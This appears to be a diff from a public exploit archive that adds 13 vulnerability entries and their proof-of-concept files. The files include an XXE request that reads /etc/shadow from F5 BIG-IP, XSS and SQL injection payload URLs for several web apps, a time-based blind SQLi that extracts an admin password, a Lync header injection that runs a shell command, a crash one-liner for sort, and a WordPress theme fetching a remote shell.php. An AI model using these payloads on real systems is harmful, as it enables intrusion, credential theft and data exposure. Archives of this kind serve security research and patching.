DB: 2015-09-19

13 new exploits

files.csv

@@ -34521,3 +34521,16 @@ id,file,description,date,author,platform,type,port
 38224,platforms/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",php,webapps,80
 38225,platforms/windows/dos/38225.txt,"VBox Satellite Express 2.3.17.3 - Arbitrary Write",2015-09-17,KoreLogic,windows,dos,0
 38226,platforms/android/remote/38226.py,"Android libstagefright - Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0
+38227,platforms/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 User-Agent Header Handling Remote Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote,0
+38228,platforms/php/webapps/38228.txt,"phpLiteAdmin 'table' Parameter SQL Injection Vulnerability",2013-01-15,KedAns-Dz,php,webapps,0
+38229,platforms/php/webapps/38229.txt,"IP.Gallery 'img' Parameter SQL Injection Vulnerability",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0
+38230,platforms/multiple/remote/38230.txt,"Apache OFBiz 10.4.x Multiple Cross Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",multiple,remote,0
+38231,platforms/php/webapps/38231.txt,"Scripts Genie Classified Ultra SQL Injection and Cross Site Scripting Vulnerabilities",2013-01-20,3spi0n,php,webapps,0
+38232,platforms/linux/local/38232.txt,"GNU Coreutils 'sort' Text Utility Buffer Overflow Vulnerability",2013-01-21,anonymous,linux,local,0
+38233,platforms/hardware/remote/38233.txt,"F5 Networks BIG-IP XML External Entity Injection Vulnerability",2013-01-21,anonymous,hardware,remote,0
+38234,platforms/php/webapps/38234.txt,"DigiLIBE Execution-After-Redirect Information Disclosure Vulnerability",2013-01-22,"Robert Gilbert",php,webapps,0
+38235,platforms/jsp/webapps/38235.txt,"Perforce P4Web Multiple Cross Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps,0
+38236,platforms/php/webapps/38236.txt,"gpEasy CMS 'section' Parameter Cross Site Scripting Vulnerability",2013-01-23,"High-Tech Bridge SA",php,webapps,0
+38237,platforms/php/webapps/38237.txt,"WordPress Chocolate WP Theme Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0
+38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0
+38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80

platforms/hardware/remote/38233.txt

@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/57496/info
+
+F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability.
+
+Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks. 
+
+POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
+Host: bigip
+Cookie: BIGIPAuthCookie=*VALID_COOKIE*
+Content-Length: 143
+
+<?xml  version="1.0" encoding='utf-8' ?>
+<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
+<message><dialogueType>&e;</dialogueType></message>
+
+
+The response includes the content of the file:
+
+<?xml version="1.0" encoding="utf-8"?>
+<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
+has sent unknown dialogueType '
+root:--hash--:15490::::::
+bin:*:15490::::::
+daemon:*:15490::::::
+adm:*:15490::::::
+lp:*:15490::::::
+mail:*:15490::::::
+uucp:*:15490::::::
+operator:*:15490::::::
+nobody:*:15490::::::
+tmshnobody:*:15490::::::
+admin:--hash--:15490:0:99999:7:::

platforms/jsp/webapps/38235.txt

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/57514/info
+
+Perforce P4Web is prone to multiple cross site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Perforce P4Web versions 2011.1 and 2012.1 are vulnerable; other versions may also be affected.
+
+http://www.example.com/u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl=
+
+http://www.example.com/cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&cdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&cda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cho=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
+
+http://www.example.com/@md=c&cd=//&cl=%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E&c=5q7@//?ac=81
+
+http://www.example.com/unm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&udu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&uda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
+
+http://www.example.com/filter=147&fileFilter=matching&pattern=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&showClient=showClient&Filter=Filter
+
+http://www.example.com/goField=%2F%2F%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Go=Go
+
+http://www.example.com/bnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&bdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&bow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&bda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
+
+http://www.example.com/lnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&ldu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&low=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&lda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
+
+http://www.example.com/Filter=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=25&Show=Filter
+
+http://www.example.com/Filter=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=10&Jsf=Job&Jsf=Status&Jsf=User&Jsf=Date&Jsf=Description&Show=Filter
+
+http://www.example.com/UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter 

platforms/linux/local/38232.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/57492/info
+
+GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.
+
+A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed. 
+
+% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
+[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
+13432 segmentation fault sort -d
+
+% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
+[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
+13434 segmentation fault sort -M 

platforms/multiple/remote/38230.txt

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/57463/info
+
+Apache OFBiz is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Apache OFBiz versions prior to 10.04.05 and 11.04.02 are vulnerable. 
+
+GET
+/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>
+HTTP/1.1
+Host: www.example.com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
+Firefox/17.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
+Connection: keep-alive
+Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037
+Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002 

platforms/php/webapps/38228.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57431/info
+
+phpLiteAdmin is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+phpLiteAdmin 1.8.x and 1.9.x are vulnerable. 
+
+http://www.example.com/phpliteadmin.php?action=row_view&table=' [ SQLi ] 

platforms/php/webapps/38229.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57444/info
+
+IP.Gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+IP.Gallery 2.0.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?automodule=gallery&cmd=si&img=[SQL] 

platforms/php/webapps/38231.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/57465/info
+
+Classified Ultra is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+SQL-injection:
+
+http://www.example.com/demos/classifiedultra/subclass.php?c=16'[SQLi HERE]
+
+Cross-site scripting:
+
+http://www.example.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS HERE] 

platforms/php/webapps/38234.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57499/info
+
+DigiLIBE is prone to a remote information-disclosure vulnerability.
+
+Successful exploits may allow the attacker to bypass authentication and gain access to potentially sensitive information. This may aid in further attacks.
+
+DigiLIBE 3.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/configuration/general_configuration.html 

platforms/php/webapps/38236.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57522/info
+
+gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+gpEasy CMS 3.5.2 and prior versions are vulnerable. 
+
+http://www.example.com//?cmd=new_section&section=%22%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 

platforms/php/webapps/38237.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/57541/info
+
+The Chocolate WP Theme for WordPress is prone to multiple security vulnerabilities.
+
+An attacker may leverage these issues to cause denial-of-service conditions, upload arbitrary files to the affected computer, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
+http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
+http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
+http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php 

platforms/php/webapps/38238.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57561/info
+
+The PHPWeby Free directory script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHPWeby Free directory script 1.2 is vulnerable; other versions may also be affected. 
+
+fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST 

platforms/php/webapps/38241.txt

@@ -0,0 +1,45 @@
+# Exploit Title: Pligg CMS 2.0.2 SQL injection
+# Date: 29-08-2015
+# Exploit Author: jsass
+# Vendor Homepage: http://pligg.com
+# Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip
+# Version: 2.0.2
+# Tested on: kali sana 2.0
+
+################ Q8 Gray Hat Team ################
+
+
+
+SQLInjection
+
+File : load_data_for_search.php
+
+
+ $search = new Search();
+	
+	if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){
+		
+		$pagesize = $_REQUEST['pagesize'];
+		$start_up = $_REQUEST['start_up'];
+		$limit = " LIMIT $start_up, $pagesize";	
+	}
+	if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){
+		$sql = $_REQUEST['sql'];
+		$search->sql = $sql.$limit;
+	}
+	
+	$fetch_link_summary = true;
+	$linksum_sql = $sql.$limit;
+
+Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi}
+
+Type Injection : Boolean & Time Based 
+
+Use SQLmap To Inject ..
+
+Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi}
+
+
+################ Q8 Gray Hat Team ################
+
+Great's To : sec4ever.com && alm3refh.com

platforms/windows/remote/38227.txt

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/57300/info
+
+Microsoft Lync is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to perform unauthorized actions on behalf of the victim. 
+
+GET /JW926520 HTTP/1.0
+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
+application/x-shockwave-flash, application/xaml+xml,
+application/vnd.ms-xpsdocument, application/x-ms-xbap,
+application/x-ms-application, */*
+Accept-Language: en-us
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
+CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR
+3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var
+commandtoRun =
+"C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"
+Host: meet.domainname.com
+Connection: Keep-Alive
+Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=example